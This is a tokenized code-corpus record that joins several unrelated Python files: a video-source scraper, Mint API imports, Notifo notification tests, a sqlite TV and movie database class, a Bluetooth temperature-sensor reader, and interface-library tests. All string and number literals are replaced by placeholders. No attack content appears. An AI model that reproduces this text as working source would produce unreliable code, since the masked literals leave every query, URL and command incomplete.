encode ( '<STR_LIT:utf-8>' ) <EOL> return url <EOL> except : <EOL> return <EOL> def get_sources ( self , url , hosthdDict , hostDict , locDict ) : <EOL> try : <EOL> sources = [ ] <EOL> if url == None : return sources <EOL> query = urlparse . urlparse ( url ) . query <EOL> try : query = '<STR_LIT>' % int ( re . compile ( '<STR_LIT>' ) . findall ( query ) [ <NUM_LIT:0> ] ) <EOL> except : query = '<STR_LIT>' <EOL> url = urlparse . urljoin ( self . base_link , url ) <EOL> result = client . source ( url ) <EOL> result = client . parseDOM ( result , '<STR_LIT>' , attrs = { '<STR_LIT:id>' : '<STR_LIT>' } ) [ <NUM_LIT:0> ] <EOL> result = zip ( client . parseDOM ( result , '<STR_LIT>' , ret = '<STR_LIT:value>' ) , client . parseDOM ( result , '<STR_LIT>' ) ) <EOL> result = [ i [ <NUM_LIT:0> ] for i in result if i [ <NUM_LIT:1> ] . endswith ( query ) or query == '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> direct = re . compile ( '<STR_LIT>' ) . findall ( result ) <EOL> if len ( direct ) > <NUM_LIT:0> : <EOL> quality = '<STR_LIT>' if '<STR_LIT>' in direct [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] . lower ( ) else '<STR_LIT>' <EOL> sources . append ( { '<STR_LIT:source>' : '<STR_LIT>' , '<STR_LIT>' : quality , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:url>' : direct [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] } ) <EOL> return sources <EOL> url = urlparse . urljoin ( self . base_link , result ) <EOL> url = client . source ( url , output = '<STR_LIT>' ) <EOL> if not '<STR_LIT>' in url : raise Exception ( ) <EOL> url = url . split ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> url = resolvers . request ( url ) <EOL> for i in url : sources . append ( { '<STR_LIT:source>' : '<STR_LIT>' , '<STR_LIT>' : i [ '<STR_LIT>' ] , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:url>' : i [ '<STR_LIT:url>' ] } ) <EOL> return sources <EOL> except : <EOL> return sources <EOL> def resolve ( self , url ) : <EOL> try : <EOL> if url . startswith ( '<STR_LIT>' ) : return url <EOL> url = client . 
request ( url , output = '<STR_LIT>' ) <EOL> if '<STR_LIT>' in url : url = url . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : url = url . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return url <EOL> except : <EOL> return </s>
<s> from . api import Mint <EOL> from . api import get_accounts <EOL> from . api import get_budgets <EOL> from . api import initiate_account_refresh <EOL> from . api import main <EOL> from . api import print_accounts </s>
<s> import unittest <EOL> import os <EOL> import sys <EOL> sys . path . append ( os . getcwd ( ) ) <EOL> from notifo import Notifo , send_notification <EOL> class TestNotifyUser ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . provider = "<STR_LIT>" <EOL> self . user = "<STR_LIT>" <EOL> self . provider_token = "<STR_LIT>" <EOL> self . user_token = "<STR_LIT>" <EOL> def test_notify_self ( self ) : <EOL> res = send_notification ( self . user , self . user_token , <EOL> to = self . user , msg = "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT> , res [ "<STR_LIT>" ] ) <EOL> def test_notify_self_with_object ( self ) : <EOL> res = Notifo ( self . user , self . user_token ) . send_notification ( <EOL> to = self . user , msg = "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT> , res [ "<STR_LIT>" ] ) <EOL> def test_message_with_label ( self ) : <EOL> res = send_notification ( self . user , self . user_token , <EOL> to = self . user , msg = "<STR_LIT>" , label = "<STR_LIT:label>" ) <EOL> self . assertEqual ( <NUM_LIT> , res [ "<STR_LIT>" ] ) <EOL> def test_message_with_plain_args ( self ) : <EOL> res = send_notification ( self . user , self . user_token , <EOL> self . user , "<STR_LIT>" , "<STR_LIT:label>" ) <EOL> self . assertEqual ( <NUM_LIT> , res [ "<STR_LIT>" ] ) <EOL> def test_message_with_title ( self ) : <EOL> res = send_notification ( self . user , self . user_token , <EOL> to = self . user , msg = "<STR_LIT>" , title = "<STR_LIT:title>" ) <EOL> self . assertEqual ( <NUM_LIT> , res [ "<STR_LIT>" ] ) <EOL> def test_message_with_callback ( self ) : <EOL> res = send_notification ( self . user , self . user_token , <EOL> to = self . user , msg = "<STR_LIT>" , <EOL> uri = "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT> , res [ "<STR_LIT>" ] ) <EOL> def test_message_from_provider ( self ) : <EOL> res = send_notification ( self . provider , self . provider_token , <EOL> to = self . user , msg = "<STR_LIT>" ) <EOL> self . 
assertEqual ( <NUM_LIT> , res [ "<STR_LIT>" ] ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import sqlite3 <EOL> from datetime import datetime <EOL> import config <EOL> import metadata <EOL> SERIES_COLUMNS = "<STR_LIT>" <EOL> EPISODE_COLUMNS = "<STR_LIT>" <EOL> MOVIE_COLUMNS = "<STR_LIT>" <EOL> TIME_FORMAT = '<STR_LIT>' <EOL> ORIGINAL_AIR_DATE_FORMAT = '<STR_LIT>' <EOL> class Database ( ) : <EOL> def __init__ ( self , config , debug ) : <EOL> self . debug = debug <EOL> database_file = config . getDatabaseFile ( ) <EOL> self . connection = sqlite3 . connect ( database_file ) <EOL> def get_series ( self , id ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' % ( SERIES_COLUMNS , ) <EOL> c . execute ( sql , ( id , ) ) <EOL> results = c . fetchall ( ) <EOL> if len ( results ) == <NUM_LIT:1> : <EOL> r = results [ <NUM_LIT:0> ] <EOL> to_return = self . create_series_from_row ( r ) <EOL> return to_return <EOL> else : <EOL> return None <EOL> finally : <EOL> c . close ( ) <EOL> def get_all_series ( self ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' % ( SERIES_COLUMNS , ) <EOL> c . execute ( sql ) <EOL> to_return = [ ] <EOL> results = c . fetchall ( ) <EOL> for r in results : <EOL> to_return . append ( self . create_series_from_row ( r ) ) <EOL> return to_return <EOL> finally : <EOL> c . close ( ) <EOL> def add_series ( self , series ) : <EOL> existing_series = self . get_series ( series . id ) <EOL> if existing_series is None : <EOL> if self . debug : <EOL> print "<STR_LIT>" % ( series . title , ) <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> if series . watch : <EOL> watch = <NUM_LIT:1> <EOL> else : <EOL> watch = <NUM_LIT:0> <EOL> c . execute ( <EOL> '<STR_LIT>' , <EOL> ( series . id , series . zap2it_id , series . imdb_id , series . title , series . description , '<STR_LIT:|>' . join ( series . actors ) , '<STR_LIT:|>' . join ( series . genres ) , series . content_rating , watch ) ) <EOL> self . connection . commit ( ) <EOL> finally : <EOL> c . 
close ( ) <EOL> def watch_series ( self , series , watch ) : <EOL> existing_series = self . get_series ( series . id ) <EOL> if not existing_series is None : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> if watch : <EOL> db_watch = <NUM_LIT:1> <EOL> else : <EOL> db_watch = <NUM_LIT:0> <EOL> c . execute ( <EOL> '<STR_LIT>' , <EOL> ( db_watch , series . id ) ) <EOL> self . connection . commit ( ) <EOL> finally : <EOL> c . close ( ) <EOL> if watch : <EOL> print "<STR_LIT>" % ( series . title , ) <EOL> else : <EOL> print "<STR_LIT>" % ( series . title , ) <EOL> def get_watched_series ( self ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' % ( SERIES_COLUMNS , ) <EOL> c . execute ( sql ) <EOL> to_return = [ ] <EOL> results = c . fetchall ( ) <EOL> for r in results : <EOL> to_return . append ( self . create_series_from_row ( r ) ) <EOL> return to_return <EOL> finally : <EOL> c . close ( ) <EOL> def clear_series ( self , series_id ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' <EOL> c . execute ( sql , ( series_id , ) ) <EOL> self . connection . commit ( ) <EOL> finally : <EOL> c . close ( ) <EOL> def add_episode ( self , episode , series ) : <EOL> if self . debug : <EOL> print "<STR_LIT>" % ( episode . season_number , episode . episode_number , series . title ) <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> directors = '<STR_LIT:|>' . join ( episode . directors ) <EOL> guest_stars = '<STR_LIT:|>' . join ( episode . guest_stars ) <EOL> writers = '<STR_LIT:|>' . join ( episode . writers ) <EOL> executive_producers = '<STR_LIT:|>' . join ( episode . executive_producers ) <EOL> producers = '<STR_LIT:|>' . join ( episode . producers ) <EOL> if episode . original_air_date is None : <EOL> original_air_date = '<STR_LIT>' <EOL> else : <EOL> original_air_date = episode . original_air_date . 
strftime ( ORIGINAL_AIR_DATE_FORMAT ) <EOL> sql = '<STR_LIT>' <EOL> sql = sql + '<STR_LIT>' <EOL> sql = sql + '<STR_LIT>' <EOL> sql = sql + '<STR_LIT>' <EOL> sql = sql + '<STR_LIT>' <EOL> c . execute ( sql , <EOL> ( series . id , episode . title , episode . description , episode . season_number , <EOL> episode . episode_number , original_air_date , <EOL> episode . rating , directors , episode . host , episode . choreographer , <EOL> guest_stars , writers , executive_producers , producers ) ) <EOL> self . connection . commit ( ) <EOL> finally : <EOL> c . close ( ) <EOL> def clear_all_episodes ( self , series_id ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' <EOL> c . execute ( sql , ( series_id , ) ) <EOL> self . connection . commit ( ) <EOL> finally : <EOL> c . close ( ) <EOL> def get_all_episodes ( self , series_id ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' % ( SERIES_COLUMNS , EPISODE_COLUMNS , ) <EOL> c . execute ( sql , ( series_id , ) ) <EOL> results = c . fetchall ( ) <EOL> to_return = [ ] <EOL> for r in results : <EOL> to_return . append ( self . create_episode_from_row ( r ) ) <EOL> return to_return <EOL> finally : <EOL> c . close ( ) <EOL> def get_episodes ( self , series_id , season_number ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' % ( SERIES_COLUMNS , EPISODE_COLUMNS , ) <EOL> c . execute ( sql , ( series_id , season_number ) ) <EOL> results = c . fetchall ( ) <EOL> to_return = [ ] <EOL> for r in results : <EOL> to_return . append ( self . create_episode_from_row ( r ) ) <EOL> return to_return <EOL> finally : <EOL> c . close ( ) <EOL> def get_episode ( self , series_id , season_number , episode_number ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' % ( SERIES_COLUMNS , EPISODE_COLUMNS , ) <EOL> c . execute ( sql , ( series_id , season_number , episode_number ) ) <EOL> results = c . 
fetchall ( ) <EOL> if len ( results ) == <NUM_LIT:1> : <EOL> to_return = self . create_episode_from_row ( results [ <NUM_LIT:0> ] ) <EOL> return to_return <EOL> else : <EOL> return None <EOL> finally : <EOL> c . close ( ) <EOL> def get_episode_by_date ( self , series_id , year , month , day ) : <EOL> the_date = datetime ( year , month , day ) <EOL> the_date_str = the_date . strftime ( ORIGINAL_AIR_DATE_FORMAT ) <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' % ( SERIES_COLUMNS , EPISODE_COLUMNS , ) <EOL> c . execute ( sql , ( series_id , the_date_str ) ) <EOL> results = c . fetchall ( ) <EOL> if len ( results ) == <NUM_LIT:1> : <EOL> to_return = self . create_episode_from_row ( results [ <NUM_LIT:0> ] ) <EOL> return to_return <EOL> else : <EOL> return None <EOL> finally : <EOL> c . close ( ) <EOL> def get_movie ( self , id ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' % ( MOVIE_COLUMNS , ) <EOL> c . execute ( sql , ( id , ) ) <EOL> results = c . fetchall ( ) <EOL> if len ( results ) == <NUM_LIT:1> : <EOL> r = results [ <NUM_LIT:0> ] <EOL> to_return = self . create_movie_from_row ( r ) <EOL> return to_return <EOL> else : <EOL> return None <EOL> finally : <EOL> c . close ( ) <EOL> def get_all_movies ( self ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' % ( MOVIE_COLUMNS , ) <EOL> c . execute ( sql ) <EOL> to_return = [ ] <EOL> results = c . fetchall ( ) <EOL> for r in results : <EOL> to_return . append ( self . create_movie_from_row ( r ) ) <EOL> return to_return <EOL> finally : <EOL> c . close ( ) <EOL> def add_movie ( self , movie ) : <EOL> existing_movie = self . get_movie ( movie . id ) <EOL> if existing_movie is None : <EOL> if self . debug : <EOL> print "<STR_LIT>" % ( movie . title , ) <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> c . execute ( <EOL> '<STR_LIT>' , <EOL> ( movie . id , movie . title , movie . description , movie . time , movie . 
rating , '<STR_LIT:|>' . join ( movie . directors ) , '<STR_LIT:|>' . join ( movie . writers ) , '<STR_LIT:|>' . join ( movie . producers ) , '<STR_LIT:|>' . join ( movie . actors ) , movie . movie_year , movie . mpaa_rating , '<STR_LIT:|>' . join ( movie . genres ) ) ) <EOL> self . connection . commit ( ) <EOL> finally : <EOL> c . close ( ) <EOL> def clear_movie ( self , movie_id ) : <EOL> c = self . connection . cursor ( ) <EOL> try : <EOL> sql = '<STR_LIT>' <EOL> c . execute ( sql , ( movie_id , ) ) <EOL> self . connection . commit ( ) <EOL> finally : <EOL> c . close ( ) <EOL> def create_series_from_row ( self , row ) : <EOL> to_return = metadata . Series ( ) <EOL> to_return . id = row [ <NUM_LIT:0> ] <EOL> to_return . zap2it_id = row [ <NUM_LIT:1> ] <EOL> to_return . imdb_id = row [ <NUM_LIT:2> ] <EOL> to_return . title = row [ <NUM_LIT:3> ] <EOL> to_return . description = row [ <NUM_LIT:4> ] <EOL> to_return . actors = row [ <NUM_LIT:5> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . genres = row [ <NUM_LIT:6> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . content_rating = row [ <NUM_LIT:7> ] <EOL> if row [ <NUM_LIT:8> ] == <NUM_LIT:1> : <EOL> to_return . watch = True <EOL> else : <EOL> to_return . watch = False <EOL> return to_return <EOL> def create_episode_from_row ( self , row ) : <EOL> to_return = metadata . Episode ( ) <EOL> to_return . series = self . create_series_from_row ( row ) <EOL> to_return . db_id = row [ <NUM_LIT:9> ] <EOL> to_return . title = row [ <NUM_LIT:10> ] <EOL> to_return . description = row [ <NUM_LIT:11> ] <EOL> to_return . season_number = row [ <NUM_LIT:12> ] <EOL> to_return . episode_number = row [ <NUM_LIT> ] <EOL> if not row [ <NUM_LIT> ] . strip ( ) == '<STR_LIT>' : <EOL> to_return . original_air_date = self . get_datetime_from_string ( row [ <NUM_LIT> ] , ORIGINAL_AIR_DATE_FORMAT ) <EOL> else : <EOL> to_return . original_air_date = None <EOL> to_return . rating = row [ <NUM_LIT:15> ] <EOL> to_return . 
directors = row [ <NUM_LIT:16> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . host = row [ <NUM_LIT> ] <EOL> to_return . choreographer = row [ <NUM_LIT> ] <EOL> to_return . guest_stars = row [ <NUM_LIT> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . writers = row [ <NUM_LIT:20> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . executive_producers = row [ <NUM_LIT> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . producers = row [ <NUM_LIT> ] . split ( '<STR_LIT:|>' ) <EOL> return to_return <EOL> def create_movie_from_row ( self , row ) : <EOL> to_return = metadata . Movie ( ) <EOL> to_return . db_id = row [ <NUM_LIT:0> ] <EOL> to_return . id = row [ <NUM_LIT:1> ] <EOL> to_return . title = row [ <NUM_LIT:2> ] <EOL> to_return . description = row [ <NUM_LIT:3> ] <EOL> if not row [ <NUM_LIT:4> ] . strip ( ) == '<STR_LIT>' : <EOL> to_return . time = self . get_datetime_from_string ( row [ <NUM_LIT:4> ] , TIME_FORMAT ) <EOL> else : <EOL> to_return . time = None <EOL> to_return . rating = row [ <NUM_LIT:5> ] <EOL> to_return . directors = row [ <NUM_LIT:6> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . writers = row [ <NUM_LIT:7> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . producers = row [ <NUM_LIT:8> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . actors = row [ <NUM_LIT:9> ] . split ( '<STR_LIT:|>' ) <EOL> to_return . movie_year = row [ <NUM_LIT:10> ] <EOL> to_return . mpaa_rating = row [ <NUM_LIT:11> ] <EOL> to_return . genres = row [ <NUM_LIT:12> ] . split ( '<STR_LIT:|>' ) <EOL> return to_return <EOL> def get_datetime_from_string ( self , input_str , format ) : <EOL> if input_str is None or input_str == '<STR_LIT>' : <EOL> return None <EOL> else : <EOL> return datetime . strptime ( input_str , format ) </s>
<s> import pexpect <EOL> import sys <EOL> import time <EOL> def floatfromhex ( h ) : <EOL> t = float . fromhex ( h ) <EOL> if t > float . fromhex ( '<STR_LIT>' ) : <EOL> t = - ( float . fromhex ( '<STR_LIT>' ) - t ) <EOL> pass <EOL> return t <EOL> def calcTmpTarget ( objT , ambT ) : <EOL> m_tmpAmb = ambT / <NUM_LIT> <EOL> Vobj2 = objT * <NUM_LIT> <EOL> Tdie2 = m_tmpAmb + <NUM_LIT> <EOL> S0 = <NUM_LIT> <EOL> a1 = <NUM_LIT> <EOL> a2 = - <NUM_LIT> <EOL> b0 = - <NUM_LIT> <EOL> b1 = - <NUM_LIT> <EOL> b2 = <NUM_LIT> <EOL> c2 = <NUM_LIT> <EOL> Tref = <NUM_LIT> <EOL> S = S0 * ( <NUM_LIT:1> + a1 * ( Tdie2 - Tref ) + a2 * pow ( ( Tdie2 - Tref ) , <NUM_LIT:2> ) ) <EOL> Vos = b0 + b1 * ( Tdie2 - Tref ) + b2 * pow ( ( Tdie2 - Tref ) , <NUM_LIT:2> ) <EOL> fObj = ( Vobj2 - Vos ) + c2 * pow ( ( Vobj2 - Vos ) , <NUM_LIT:2> ) <EOL> tObj = pow ( pow ( Tdie2 , <NUM_LIT:4> ) + ( fObj / S ) , <NUM_LIT> ) <EOL> tObj = ( tObj - <NUM_LIT> ) <EOL> print "<STR_LIT>" % tObj <EOL> bluetooth_adr = sys . argv [ <NUM_LIT:1> ] <EOL> tool = pexpect . spawn ( '<STR_LIT>' + bluetooth_adr + '<STR_LIT>' ) <EOL> tool . expect ( '<STR_LIT>' ) <EOL> print "<STR_LIT>" <EOL> tool . sendline ( '<STR_LIT>' ) <EOL> tool . expect ( '<STR_LIT>' ) <EOL> tool . sendline ( '<STR_LIT>' ) <EOL> tool . expect ( '<STR_LIT>' ) <EOL> while True : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> tool . sendline ( '<STR_LIT>' ) <EOL> tool . expect ( '<STR_LIT>' ) <EOL> rval = tool . after . split ( ) <EOL> objT = floatfromhex ( rval [ <NUM_LIT:2> ] + rval [ <NUM_LIT:1> ] ) <EOL> ambT = floatfromhex ( rval [ <NUM_LIT:4> ] + rval [ <NUM_LIT:3> ] ) <EOL> calcTmpTarget ( objT , ambT ) </s>
<s> import inspect <EOL> import unittest <EOL> import six <EOL> from wiring . interface import ( <EOL> Attribute , <EOL> Interface , <EOL> InterfaceComplianceError , <EOL> Method , <EOL> MethodValidationError , <EOL> MissingAttributeError , <EOL> get_implemented_interfaces , <EOL> implements , <EOL> implements_only , <EOL> isimplementation <EOL> ) <EOL> from . import ModuleTest <EOL> class InterfaceModuleTest ( ModuleTest ) : <EOL> module = '<STR_LIT>' <EOL> class AttributeTest ( unittest . TestCase ) : <EOL> def test_construction ( self ) : <EOL> attribute = Attribute ( ) <EOL> self . assertIsNone ( attribute . docstring ) <EOL> attribute = Attribute ( docstring = "<STR_LIT>" ) <EOL> self . assertEqual ( attribute . docstring , "<STR_LIT>" ) <EOL> def test_repr ( self ) : <EOL> attribute = Attribute ( ) <EOL> self . assertEqual ( repr ( attribute ) , '<STR_LIT>' ) <EOL> attribute = Attribute ( docstring = "<STR_LIT>" ) <EOL> self . assertEqual ( repr ( attribute ) , '<STR_LIT>' ) <EOL> class MethodTest ( unittest . TestCase ) : <EOL> def _example_method_definition ( foo , bar = <NUM_LIT:12> ) : <EOL> """<STR_LIT>""" <EOL> def _example_method_implementation ( self , foo , bar = <NUM_LIT:12> ) : <EOL> pass <EOL> @ classmethod <EOL> def _example_method_classmethod ( cls , foo , bar = <NUM_LIT:12> ) : <EOL> pass <EOL> @ staticmethod <EOL> def _example_method_static ( foo , bar = <NUM_LIT:12> ) : <EOL> pass <EOL> def _get_argspec ( self , function ) : <EOL> if six . PY3 : <EOL> return inspect . getfullargspec ( function ) <EOL> else : <EOL> return inspect . getargspec ( function ) <EOL> def test_construction ( self ) : <EOL> argspec = self . _get_argspec ( self . _example_method_definition ) <EOL> method = Method ( argspec ) <EOL> self . assertEqual ( method . argument_specification , argspec ) <EOL> self . assertIsNone ( method . docstring ) <EOL> method = Method ( argspec , docstring = "<STR_LIT>" ) <EOL> self . assertEqual ( method . 
argument_specification , argspec ) <EOL> self . assertEqual ( method . docstring , "<STR_LIT>" ) <EOL> def test_repr ( self ) : <EOL> argspec = self . _get_argspec ( self . _example_method_definition ) <EOL> method = Method ( argspec ) <EOL> self . assertEqual ( repr ( method ) , '<STR_LIT>' ) <EOL> method = Method ( argspec , docstring = "<STR_LIT>" ) <EOL> self . assertEqual ( repr ( method ) , '<STR_LIT>' ) <EOL> def test_check_compliance ( self ) : <EOL> argspec = self . _get_argspec ( self . _example_method_definition ) <EOL> method = Method ( argspec ) <EOL> method . check_compliance ( self . _example_method_implementation ) <EOL> method . check_compliance ( self . _example_method_classmethod ) <EOL> method . check_compliance ( self . _example_method_static ) <EOL> def other_implementation ( foo , bar = <NUM_LIT:12> ) : <EOL> pass <EOL> method . check_compliance ( other_implementation ) <EOL> def invalid_implementation ( foo , bar = <NUM_LIT> ) : <EOL> pass <EOL> with self . assertRaises ( MethodValidationError ) as cm : <EOL> method . check_compliance ( invalid_implementation ) <EOL> self . assertEquals ( <EOL> cm . exception . expected_argspec , <EOL> argspec <EOL> ) <EOL> self . assertEquals ( <EOL> cm . exception . observed_argspec , <EOL> self . _get_argspec ( invalid_implementation ) <EOL> ) <EOL> self . assertEquals ( <EOL> str ( cm . exception ) , <EOL> ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> ) <EOL> class InterfaceTest ( unittest . TestCase ) : <EOL> def assertAttributes ( self , interface , attributes ) : <EOL> self . assertSetEqual ( <EOL> frozenset ( six . iterkeys ( interface . 
attributes ) ) , <EOL> frozenset ( attributes ) <EOL> ) <EOL> def test_elements ( self ) : <EOL> class IPerson ( Interface ) : <EOL> first_name = Attribute ( """<STR_LIT>""" ) <EOL> last_name = """<STR_LIT>""" <EOL> age = <NUM_LIT> <EOL> def get_full_name ( ) : <EOL> """<STR_LIT>""" <EOL> def add_friend ( friend , close = False ) : <EOL> pass <EOL> self . assertAttributes ( <EOL> IPerson , <EOL> [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> first_name = IPerson . attributes [ '<STR_LIT>' ] <EOL> self . assertIsInstance ( first_name , Attribute ) <EOL> self . assertEqual ( first_name . docstring , "<STR_LIT>" ) <EOL> last_name = IPerson . attributes [ '<STR_LIT>' ] <EOL> self . assertIsInstance ( last_name , Attribute ) <EOL> self . assertEqual ( last_name . docstring , "<STR_LIT>" ) <EOL> age = IPerson . attributes [ '<STR_LIT>' ] <EOL> self . assertIsInstance ( age , Attribute ) <EOL> self . assertIsNone ( age . docstring ) <EOL> get_full_name = IPerson . attributes [ '<STR_LIT>' ] <EOL> self . assertIsInstance ( get_full_name , Method ) <EOL> self . assertEqual ( <EOL> get_full_name . docstring , <EOL> "<STR_LIT>" <EOL> ) <EOL> if six . PY3 : <EOL> self . assertEqual ( <EOL> get_full_name . argument_specification , <EOL> inspect . FullArgSpec ( <EOL> args = [ ] , <EOL> varargs = None , <EOL> varkw = None , <EOL> defaults = None , <EOL> kwonlyargs = [ ] , <EOL> kwonlydefaults = None , <EOL> annotations = { } <EOL> ) <EOL> ) <EOL> else : <EOL> self . assertEqual ( <EOL> get_full_name . argument_specification , <EOL> inspect . ArgSpec ( <EOL> args = [ ] , <EOL> varargs = None , <EOL> keywords = None , <EOL> defaults = None <EOL> ) <EOL> ) <EOL> add_friend = IPerson . attributes [ '<STR_LIT>' ] <EOL> self . assertIsInstance ( add_friend , Method ) <EOL> self . assertIsNone ( add_friend . docstring ) <EOL> if six . PY3 : <EOL> self . assertEqual ( <EOL> add_friend . 
argument_specification , <EOL> inspect . FullArgSpec ( <EOL> args = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> varargs = None , <EOL> varkw = None , <EOL> defaults = ( False , ) , <EOL> kwonlyargs = [ ] , <EOL> kwonlydefaults = None , <EOL> annotations = { } <EOL> ) <EOL> ) <EOL> else : <EOL> self . assertEqual ( <EOL> add_friend . argument_specification , <EOL> inspect . ArgSpec ( <EOL> args = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> varargs = None , <EOL> keywords = None , <EOL> defaults = ( False , ) <EOL> ) <EOL> ) <EOL> def test_inheritance ( self ) : <EOL> class IEntity ( Interface ) : <EOL> id = Attribute ( """<STR_LIT>""" ) <EOL> class IItem ( IEntity ) : <EOL> name = Attribute ( """<STR_LIT>""" ) <EOL> class ICreature ( IEntity ) : <EOL> name = Attribute ( """<STR_LIT>""" ) <EOL> def give ( item ) : <EOL> pass <EOL> class ISprite ( Interface ) : <EOL> name = Attribute ( """<STR_LIT>""" ) <EOL> def get_frame ( time ) : <EOL> pass <EOL> class IPlayer ( ICreature , ISprite ) : <EOL> email = Attribute ( """<STR_LIT>""" ) <EOL> def login ( ) : <EOL> pass <EOL> self . assertAttributes ( <EOL> IEntity , <EOL> [ '<STR_LIT:id>' ] <EOL> ) <EOL> self . assertAttributes ( <EOL> IItem , <EOL> [ '<STR_LIT:id>' , '<STR_LIT:name>' ] <EOL> ) <EOL> self . assertEqual ( <EOL> IItem . attributes [ '<STR_LIT:name>' ] . docstring , <EOL> "<STR_LIT>" <EOL> ) <EOL> self . assertAttributes ( <EOL> ICreature , <EOL> [ <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT:name>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> self . assertEqual ( <EOL> ICreature . attributes [ '<STR_LIT:name>' ] . docstring , <EOL> "<STR_LIT>" <EOL> ) <EOL> self . assertAttributes ( <EOL> ISprite , <EOL> [ <EOL> '<STR_LIT:name>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> self . 
assertAttributes ( <EOL> IPlayer , <EOL> [ <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT:name>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:email>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> def test_check_compliance ( self ) : <EOL> class IPerson ( Interface ) : <EOL> first_name = """<STR_LIT>""" <EOL> last_name = """<STR_LIT>""" <EOL> def get_full_name ( ) : <EOL> """<STR_LIT>""" <EOL> class ValidPerson ( object ) : <EOL> def __init__ ( self ) : <EOL> self . first_name = "<STR_LIT>" <EOL> self . last_name = "<STR_LIT>" <EOL> def get_full_name ( self ) : <EOL> return '<STR_LIT:U+0020>' . join ( ( self . first_name , self . last_name ) ) <EOL> class MissingAttributePerson ( object ) : <EOL> def __init__ ( self ) : <EOL> self . last_name = "<STR_LIT>" <EOL> def get_full_name ( self ) : <EOL> return self . last_name <EOL> class BadMethodPerson ( object ) : <EOL> def __init__ ( self ) : <EOL> self . first_name = "<STR_LIT>" <EOL> self . last_name = "<STR_LIT>" <EOL> def get_full_name ( self , foobar ) : <EOL> return '<STR_LIT:U+0020>' . join ( ( self . first_name , self . last_name ) ) <EOL> with self . assertRaises ( TypeError ) : <EOL> IPerson . check_compliance ( ValidPerson ) <EOL> IPerson . check_compliance ( ValidPerson ( ) ) <EOL> with self . assertRaises ( MissingAttributeError ) as cm : <EOL> IPerson . check_compliance ( MissingAttributePerson ( ) ) <EOL> self . assertIsInstance ( cm . exception , InterfaceComplianceError ) <EOL> self . assertEquals ( cm . exception . attribute_name , '<STR_LIT>' ) <EOL> self . assertEquals ( <EOL> str ( cm . exception ) , <EOL> "<STR_LIT>" <EOL> ) <EOL> bad_method_person = BadMethodPerson ( ) <EOL> with self . assertRaises ( MethodValidationError ) as cm : <EOL> IPerson . check_compliance ( bad_method_person ) <EOL> self . assertIsInstance ( cm . exception , InterfaceComplianceError ) <EOL> self . assertEquals ( <EOL> cm . exception . function , <EOL> bad_method_person . 
